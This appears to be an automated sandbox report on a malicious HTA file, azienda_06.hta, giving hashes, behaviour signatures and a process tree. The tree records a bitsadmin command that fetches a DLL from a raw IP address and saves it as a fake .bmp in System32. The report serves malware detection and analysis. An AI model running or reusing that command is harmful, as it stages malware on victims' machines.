Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2023 10:41
Static task
static1
Behavioral task
behavioral1
Sample
azienda_06.hta
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
azienda_06.hta
Resource
win10v2004-20221111-en
General
-
Target
azienda_06.hta
-
Size
6KB
-
MD5
44b177b19558678908e630d8b8417a42
-
SHA1
29a8811b5c4ccb565c1064030ffcd9ca0937a938
-
SHA256
9c0e1d6757b3d880418d1aacaebde1afa1412c3b180113343dd106726635da42
-
SHA512
f0face3ad274e54e65f8d7b725e0afbe78f361647bdd825e258da9c17d1ff3a342d5b01a20b8b557e67a82f408ecfedc53649df7ab6abae237ad0646a3dbbdd4
-
SSDEEP
96:wY7LVTUoPg2pwTEeD4b7KdaO3iOaLt3M8Mn3XTPMJsb0ODcFE+Voq3V4dh96rK9B:nU77rIKdn863jMM0OD9+VVF4nx4kuE
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 9 1776 mshta.exe 11 1776 mshta.exe 14 1776 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 3484 bitsadmin.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1776 wrote to memory of 3484 1776 mshta.exe 83 PID 1776 wrote to memory of 3484 1776 mshta.exe 83 PID 1776 wrote to memory of 3484 1776 mshta.exe 83
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\azienda_06.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://62.173.147.2/azienda.dll C:\Windows\\System32\\LogFiles\\\login.bmp2⤵
- Download via BitsAdmin
PID:3484
-